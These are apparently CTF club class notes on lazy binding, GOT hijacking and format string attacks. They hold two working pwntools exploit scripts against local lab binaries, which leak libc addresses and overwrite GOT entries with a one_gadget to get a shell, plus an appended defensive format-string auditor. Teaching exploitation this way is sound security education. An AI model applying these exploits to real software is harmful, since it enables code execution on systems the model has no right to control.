# NCtfU - 3/25(r8)

###### tags: `nctfu2022spring`

## Start time

- PM 8:10

## youtube link

https://youtu.be/IS-UJSGvByM (contact r8 if you need it)

## Attending

- idisused
- ppodds (don't wait for me, I may not make it in time)

## Speaker notes

[NCtfU - 3/18(r8) - HackMD](https://hackmd.io/OPpGdnptSGmfVpl0rJhRiA)

```
Install the pwn tool bundle
https://github.com/r888800009/CTF-tool/tree/master/pwn_docker
```

[corrected slides](https://drive.google.com/file/d/1Owgs8-oV2MNGKINjsfNnx9ZPK7nSYxcg/view?usp=sharing)

~~[slides](https://drive.google.com/file/d/1PyiI0tDDb3DjVNVyQ05D7whwPPGOmurq/view?usp=sharing)~~

### outline

- Lazy Binding
- GOT Hijacking
- Format String Attack

Next class:

- file structure exploit
- vtable
- Heap
- link_map

[feedback form](https://docs.google.com/forms/d/e/1FAIpQLSfIw0OI3H26h6OtiP6zd9fU8l5QXyUOPqUA0QRd2O2RGHfqLQ/viewform)

## Shared notes

### got_hijack

```python=
from pwn import *

context.arch = 'amd64'
elf = ELF('./got_hijack')
p = process('./got_hijack')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# The program indexes an array of 8-byte slots starting at `data` without a
# bounds check, so the GOT entry of scanf is reachable as an array index.
offset = (elf.got['__isoc99_scanf'] - elf.symbols['data']) // 8
print(offset)
p.sendlineafter(b':', str(offset).encode())

# Read the leaked GOT value (already resolved because of lazy binding)
p.recvuntil(b'=')
printf_addr = int(p.recvline().strip())
print(hex(printf_addr))

# Compute the libc base and overwrite the GOT entry with a one_gadget
libc_base = printf_addr - libc.symbols['__isoc99_scanf']
one_gadget = libc_base + 0xe3b31
p.sendlineafter(b":", str(one_gadget).encode())
p.interactive()
```

### fmtstr_stack

```python=
from pwn import *

context.arch = 'amd64'
elf = ELF('./fmtstr_stack')
p = process('./fmtstr_stack')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# one_gadget = 0xe3b31

# Leak stack slot 14 (an address inside the PIE binary) and slot 27
# (the return address into __libc_start_main)
p.sendlineafter(b'\n', b"%14$p\n%27$p\n")
p.recvuntil(b"f\n")

# elf_base: offset of the leaked value from the ELF base (measured with ASLR off)
elf_base = p.recvline().decode().strip()
print(elf_base)
elf_base = int(elf_base, 16) - (0x00555555554040 - 0x00555555554000)

# start_main - lib_c: offset of the leaked return address from the libc base
libc_base = p.recvline().decode().strip()
libc_base = int(libc_base, 16) - (0x007ffff7df10b3 - 0x007ffff7dcd000)

# Overwrite puts@GOT byte by byte with a one_gadget; the format string is
# the 8th argument on the stack
got_puts = elf_base + elf.got['puts']
one_gadget = libc_base + 0xe3b31
payload = fmtstr_payload(8, {got_puts: one_gadget}, write_size='byte', numbwritten=0)
p.sendafter(b"reading\n", payload)
p.interactive()
```
https://github.com/r888800009/pwn-labs/blob/main/fmtstr/fmtstr_stack
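As an added defensive example (not code from the lab or from these class notes), a small auditor for user-supplied `printf` format strings: it parses each directive, works out which argument it consumes, and flags `%n`-family writes and positional reads past the real arguments, which is what the `%14$p`/`%27$p` leaks and the `%hhn` writes emitted by `fmtstr_payload` look like from the defender's side. The `max_args` parameter is an assumption of this example (0 models a bare `printf(buf)`).

```python
import re

# printf conversion specification: %[argpos$][flags][width][.precision][length]conv
_SPEC = re.compile(
    r"%(?:(?P<pos>\d+)\$)?(?P<flags>[-+ #0]*)(?P<width>\*|\d+)?"
    r"(?:\.(?P<prec>\*|\d+))?(?P<len>hh|h|ll|l|L|q|j|z|t)?(?P<conv>[diouxXeEfFgGaAcspn%])"
)

WRITE_CONVS = {"n"}  # the only conversion that writes through a pointer argument


def parse_format(fmt):
    """Return one dict per directive: argument consumed, conversion, length, writes?"""
    out = []
    next_arg = 1
    for m in _SPEC.finditer(fmt):
        conv = m.group("conv")
        if conv == "%":  # literal percent, consumes nothing
            continue
        if m.group("pos"):
            pos = int(m.group("pos"))  # explicit positional reference, e.g. %14$p
        else:
            # a '*' width or precision each consume an argument before the conversion
            next_arg += (m.group("width") == "*") + (m.group("prec") == "*")
            pos = next_arg
            next_arg += 1
        out.append({"directive": m.group(0), "arg": pos, "conv": conv,
                    "length": m.group("len") or "", "writes": conv in WRITE_CONVS})
    return out


def audit_user_format(fmt, max_args=0):
    """Flag directives that would make printf read beyond the `max_args` real
    arguments (i.e. walk the caller's stack) or write memory via %n."""
    findings = []
    for d in parse_format(fmt):
        if d["writes"]:
            findings.append(f"{d['directive']}: writes memory via argument {d['arg']}")
        elif d["arg"] > max_args:
            findings.append(f"{d['directive']}: reads argument {d['arg']}, "
                            f"past the {max_args} supplied")
    return findings


if __name__ == "__main__":
    # constructed inputs: the leak string from the lab, a byte write, and a benign one
    for s in ("%14$p\n%27$p\n", "AAAA%hhn", "hello %d"):
        print(repr(s), audit_user_format(s, max_args=1))
```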